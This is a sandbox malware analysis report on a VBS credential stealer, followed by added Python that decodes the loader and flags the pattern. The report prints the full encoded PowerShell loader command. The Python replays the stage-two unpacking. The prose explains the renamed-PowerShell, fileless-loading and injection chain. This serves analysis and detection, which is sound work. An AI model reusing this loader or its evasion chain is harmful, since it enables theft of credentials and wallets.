Windows
Analysis Report
FileCopy.vbs
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7280, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FileCopy.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7356, cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\FileCopy.vbs.exe" /Y, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7364, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- FileCopy.vbs.exe (PID: 7472, cmdline: "C:\Users\user\Desktop\FileCopy.vbs.exe" -enc JABJAHYAaQBpAGIAcwBtAGYAaQBvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEEAdAB0AGsAdgB5AGcAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABJAHYAaQBpAGIAcwBtAGYAaQBvACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEMAaQB0AGwAbQBnAGoAbgB0AGwAaQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABBAHQAdABrAHYAeQBnAC4AUgBlAHAAbABhAGMAZQAoACcAUgBFAE0AIAAnACwAIAAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACAAJwBBACcAKQApADsAJABSAHcAaQBuAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEMAaQB0AGwAbQBnAGoAbgB0AGwAaQAgACkAOwAkAFgAbwBmAHAAYQBlAGwAbwBqACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABZAHgAbAB2AGYAZgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFIAdwBpAG4AdwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAWQB4AGwAdgBmAGYAZwAuAEMAbwBwAHkAVABvACgAIAAkAFgAbwBmAHAAYQBlAGwAbwBqACAAKQA7ACQAWQB4AGwAdgBmAGYAZwAuAEMAbABvAHMAZQAoACkAOwAkAFIAdwBpAG4AdwAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEMAaQB0AGwAbQBnAGoAbgB0AGwAaQAgAD0AIAAkAFgAbwBmAHAAYQBlAGwAbwBqAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABDAGkAdABsAG0AZwBqAG4AdABsAGkAKQA7ACAAJABPAGMAaABpAHkAaAB3AGgAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAQwBpAHQAbABtAGcAagBuAHQAbABpACkAOwAgACQATQBxAGQAcgB0AGsAbQBwAGYAbgB3ACAAPQAgACQATwBjAGgAaQB5AGgAdwBoAHMAbQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAE0AcQBkAHIAdABrAG0AcABmAG4AdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQATQBxAGQAcgB0AGsAbQBwAGYAbgB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7480, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- InstallUtil.exe (PID: 7612, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
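The -enc argument on the FileCopy.vbs.exe line is base64 over UTF-16LE text, so the loader script it carries can be recovered offline without running anything. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: decode_enc_arg decodes the blob exactly as it is printed in the process tree (the page wraps it every ten characters, so whitespace is stripped first); stage2_from_last_line replays the unpacking the decoded script performs on the last line of FileCopy.vbs (drop the REM comment marker, map @ back to A, base64-decode, gunzip, reverse the bytes); loader_markers lists the in-memory-loader idioms the Sigma and Joe Security signatures above key on; and renamed_powershell_with_enc is a constructed Sysmon-style check for a renamed powershell.exe running an encoded command. The contents of FileCopy.vbs are not in the report, so build_last_line and the MZ byte string it is fed are made up solely to show the transform round-tripping; all function names are mine.

```python
"""Added example: decode the -enc loader of FileCopy.vbs.exe, replay its
second-stage unpacking, and flag the renamed-PowerShell pattern.
Not code from the Joe Sandbox report or from the sample."""
import base64
import gzip
import re

# The -enc blob as printed in the process tree above. The sandbox page breaks
# it every ten characters; re.sub() removes that whitespace before decoding.
ENC_ARG = """
JABJ AHYAaQBpAG IAcwBtAGYA aQBvACAAPQ AgAFsAUwB5 AHMAdABlAG 0ALgBEAGkA
YQBnAG4Abw BzAHQAaQBj AHMALgBQAH IAbwBjAGUA cwBzAF0AOg A6AEcAZQB0 AEMAdQByAH
IAZQBuAHQA UAByAG8AYw BlAHMAcwAo ACkALgBNAG EAaQBuAE0A bwBkAHUAbA BlAC4ARgBp
AGwAZQBOAG EAbQBlAC4A UgBlAHAAbA BhAGMAZQAo ACcALgBlAH gAZQAnACwA JwAnACkAOw
AkAEEAdAB0 AGsAdgB5AG cAIAA9ACAA ZwBlAHQALQ BjAG8AbgB0 AGUAbgB0AC AAJABJAHYA
aQBpAGIAcw BtAGYAaQBv ACAAfAAgAF MAZQBsAGUA YwB0AC0ATw BiAGoAZQBj AHQAIAAtAE
wAYQBzAHQA IAAxADsAIA AkAEMAaQB0 AGwAbQBnAG oAbgB0AGwA aQAgAD0AIA BbAFMAeQBz
AHQAZQBtAC 4AQwBvAG4A dgBlAHIAdA BdADoAOgBG AHIAbwBtAE IAYQBzAGUA NgA0AFMAdA
ByAGkAbgBn ACgAJABBAH QAdABrAHYA eQBnAC4AUg BlAHAAbABh AGMAZQAoAC cAUgBFAE0A
IAAnACwAIA AnACcAKQAu AFIAZQBwAG wAYQBjAGUA KAAnAEAAJw AsACAAJwBB ACcAKQApAD
sAJABSAHcA aQBuAHcAIA A9ACAATgBl AHcALQBPAG IAagBlAGMA dAAgAFMAeQ BzAHQAZQBt
AC4ASQBPAC 4ATQBlAG0A bwByAHkAUw B0AHIAZQBh AG0AKAAgAC wAIAAkAEMA aQB0AGwAbQ
BnAGoAbgB0 AGwAaQAgAC kAOwAkAFgA bwBmAHAAYQ BlAGwAbwBq ACAAPQAgAE 4AZQB3AC0A
TwBiAGoAZQ BjAHQAIABT AHkAcwB0AG UAbQAuAEkA TwAuAE0AZQ BtAG8AcgB5 AFMAdAByAG
UAYQBtADsA JABZAHgAbA B2AGYAZgBn ACAAPQAgAE 4AZQB3AC0A TwBiAGoAZQ BjAHQAIABT
AHkAcwB0AG UAbQAuAEkA TwAuAEMAbw BtAHAAcgBl AHMAcwBpAG 8AbgAuAEcA egBpAHAAUw
B0AHIAZQBh AG0AIAAkAF IAdwBpAG4A dwAsACAAKA BbAEkATwAu AEMAbwBtAH AAcgBlAHMA
cwBpAG8Abg AuAEMAbwBt AHAAcgBlAH MAcwBpAG8A bgBNAG8AZA BlAF0AOgA6 AEQAZQBjAG
8AbQBwAHIA ZQBzAHMAKQ A7ACQAWQB4 AGwAdgBmAG YAZwAuAEMA bwBwAHkAVA BvACgAIAAk
AFgAbwBmAH AAYQBlAGwA bwBqACAAKQ A7ACQAWQB4 AGwAdgBmAG YAZwAuAEMA bABvAHMAZQ
AoACkAOwAk AFIAdwBpAG 4AdwAuAEMA bABvAHMAZQ AoACkAOwBb AGIAeQB0AG UAWwBdAF0A
IAAkAEMAaQ B0AGwAbQBn AGoAbgB0AG wAaQAgAD0A IAAkAFgAbw BmAHAAYQBl AGwAbwBqAC
4AVABvAEEA cgByAGEAeQ AoACkAOwBb AEEAcgByAG EAeQBdADoA OgBSAGUAdg BlAHIAcwBl
ACgAJABDAG kAdABsAG0A ZwBqAG4AdA BsAGkAKQA7 ACAAJABPAG MAaABpAHkA aAB3AGgAcw
BtACAAPQAg AFsAUwB5AH MAdABlAG0A LgBBAHAAcA BEAG8AbQBh AGkAbgBdAD oAOgBDAHUA
cgByAGUAbg B0AEQAbwBt AGEAaQBuAC 4ATABvAGEA ZAAoACQAQw BpAHQAbABt AGcAagBuAH
QAbABpACkA OwAgACQATQ BxAGQAcgB0 AGsAbQBwAG YAbgB3ACAA PQAgACQATw BjAGgAaQB5
AGgAdwBoAH MAbQAuAEUA bgB0AHIAeQ BQAG8AaQBu AHQAOwAgAF sAUwB5AHMA dABlAG0ALg
BEAGUAbABl AGcAYQB0AG UAXQA6ADoA QwByAGUAYQ B0AGUARABl AGwAZQBnAG EAdABlACgA
WwBBAGMAdA BpAG8AbgBd ACwAIAAkAE 0AcQBkAHIA dABrAG0AcA BmAG4AdwAu AEQAZQBjAG
wAYQByAGkA bgBnAFQAeQ BwAGUALAAg ACQATQBxAG QAcgB0AGsA bQBwAGYAbg B3AC4ATgBh
AG0AZQApAC 4ARAB5AG4A YQBtAGkAYw BJAG4AdgBv AGsAZQAoAC kAIAB8ACAA TwB1AHQALQ BOAHUAbABs AA==
"""


def decode_enc_arg(blob: str) -> str:
    """powershell.exe -enc / -EncodedCommand takes base64 over UTF-16LE script text."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob))
    return raw.decode("utf-16-le")


def stage2_from_last_line(last_line: str) -> bytes:
    """Replay what the decoded loader does to the last line of FileCopy.vbs:
    drop the VBS comment marker, undo the A -> @ substitution, base64-decode,
    gunzip, then reverse the byte order before [AppDomain]::Load."""
    b64 = last_line.replace("REM ", "").replace("@", "A")
    return gzip.decompress(base64.b64decode(b64))[::-1]


def build_last_line(assembly: bytes) -> str:
    """Inverse transform, constructed here only to produce test input: the .vbs
    body is not in the report, so this shows the shape the line must have."""
    b64 = base64.b64encode(gzip.compress(assembly[::-1])).decode("ascii")
    return "REM " + b64.replace("A", "@")


LOADER_MARKERS = ("FromBase64String", "GZipStream",
                  "[System.AppDomain]::CurrentDomain.Load", "DynamicInvoke")


def loader_markers(script: str) -> list[str]:
    """Case-insensitive scan for the in-memory .NET loader idioms that the
    'FromBase64String' Sigma rule and the assembly-loader Yara hits key on."""
    low = script.lower()
    return [m for m in LOADER_MARKERS if m.lower() in low]


def renamed_powershell_with_enc(image: str, original_file_name: str, cmdline: str) -> bool:
    """Constructed Sysmon-style process-creation check (not a Joe Sandbox rule):
    the image was renamed but its version-info OriginalFileName still says
    PowerShell, and the command line carries -e / -ec / -enc / -EncodedCommand."""
    basename = re.split(r"[\\/]", image)[-1].lower()
    renamed = original_file_name.lower() == "powershell.exe" and basename != "powershell.exe"
    encoded = re.search(r"(?i)(^|\s)-e(c|nc|ncodedcommand)?\s", cmdline) is not None
    return renamed and encoded


if __name__ == "__main__":
    script = decode_enc_arg(ENC_ARG)
    print(script)
    print("loader markers:", loader_markers(script))
    fake_assembly = b"MZ" + bytes(range(256))  # constructed stand-in for the .NET payload
    print("round-trip ok:", stage2_from_last_line(build_last_line(fake_assembly)) == fake_assembly)
    print("renamed powershell + -enc:", renamed_powershell_with_enc(
        r"C:\Users\user\Desktop\FileCopy.vbs.exe", "PowerShell.EXE",
        r'"C:\Users\user\Desktop\FileCopy.vbs.exe" -enc JABJ'))
```

Decoding shows why the chain above looks the way it does: the script takes its own image path with ".exe" removed, which for FileCopy.vbs.exe resolves to the original FileCopy.vbs, reads that file's last line with Select-Object -Last 1, unpacks it as described, and runs the resulting assembly's EntryPoint through a delegate. That is what the cmd.exe copy of powershell.exe to FileCopy.vbs.exe is for (the "Suspicious Copy From or To System Directory" and "Powershell is started from unusual location" signatures), and it is why no second-stage payload is visible on the command line. Loading via [AppDomain]::Load leaves nothing on disk, and the InstallUtil.exe child with no arguments is consistent with the "Creates a process in suspended mode" and "Injects a PE file" signatures, though the report does not name the injection target.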
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | 
(5 of 8 entries shown)

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
System Summary
Source: | Author: Florian Roth (Nextron Systems)